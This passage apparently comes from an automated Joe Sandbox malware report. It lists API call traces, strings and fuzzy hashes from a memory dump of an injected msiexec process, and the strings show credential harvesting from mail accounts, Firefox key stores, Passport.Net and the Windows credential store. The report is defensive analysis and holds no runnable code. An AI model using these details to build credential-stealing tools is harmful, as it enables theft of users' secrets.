                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID: gj
                                                                      • API String ID: 438689982-4203073231
                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm$__aullrem
                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                      • API String ID: 643879872-978417875
                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040810E
                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CA7B60,?), ref: 004081B9
                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                      • API String ID: 524865279-2190619648
                                                                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                      • String ID: 0$6
                                                                      • API String ID: 2300387033-3849865405
                                                                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscat$memsetsprintf
                                                                      • String ID: %2.2X
                                                                      • API String ID: 125969286-791839006
                                                                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                      APIs
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                      • String ID: ACD
                                                                      • API String ID: 82305771-620537770
                                                                      • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                      • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004091EC
                                                                      • sprintf.MSVCRT ref: 00409201
                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                      • String ID: caption$dialog_%d
                                                                      • API String ID: 2923679083-4161923789
                                                                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                      • memset.MSVCRT ref: 00410246
                                                                      • memset.MSVCRT ref: 00410258
                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                      • memset.MSVCRT ref: 0041033F
                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                      • String ID:
                                                                      • API String ID: 3974772901-0
                                                                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                      APIs
                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                      • strlen.MSVCRT ref: 004440D1
                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                      • String ID:
                                                                      • API String ID: 577244452-0
                                                                      • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                      • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                      APIs
                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strcmpi$memcpystrlen
                                                                      • String ID: imap$pop3$smtp
                                                                      • API String ID: 2025310588-821077329
                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040C02D
                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                      • API String ID: 2726666094-3614832568
                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                      APIs
                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp$memcpy
                                                                      • String ID: global-salt$password-check
                                                                      • API String ID: 231171946-3927197501
                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID:
                                                                      • API String ID: 613200358-0
                                                                      • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                      • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                      • String ID:
                                                                      • API String ID: 19018683-0
                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040644F
                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID:
                                                                      • API String ID: 438689982-0
                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                      APIs
                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                      • String ID: Passport.Net\*
                                                                      • API String ID: 2329438634-3671122194
                                                                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                      APIs
                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                      • memset.MSVCRT ref: 0040330B
                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                      • strchr.MSVCRT ref: 0040335A
                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                      • strlen.MSVCRT ref: 0040339C
                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                      • String ID: Personalities
                                                                      • API String ID: 2103853322-4287407858
                                                                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: H
                                                                      • API String ID: 2221118986-2852464175
                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
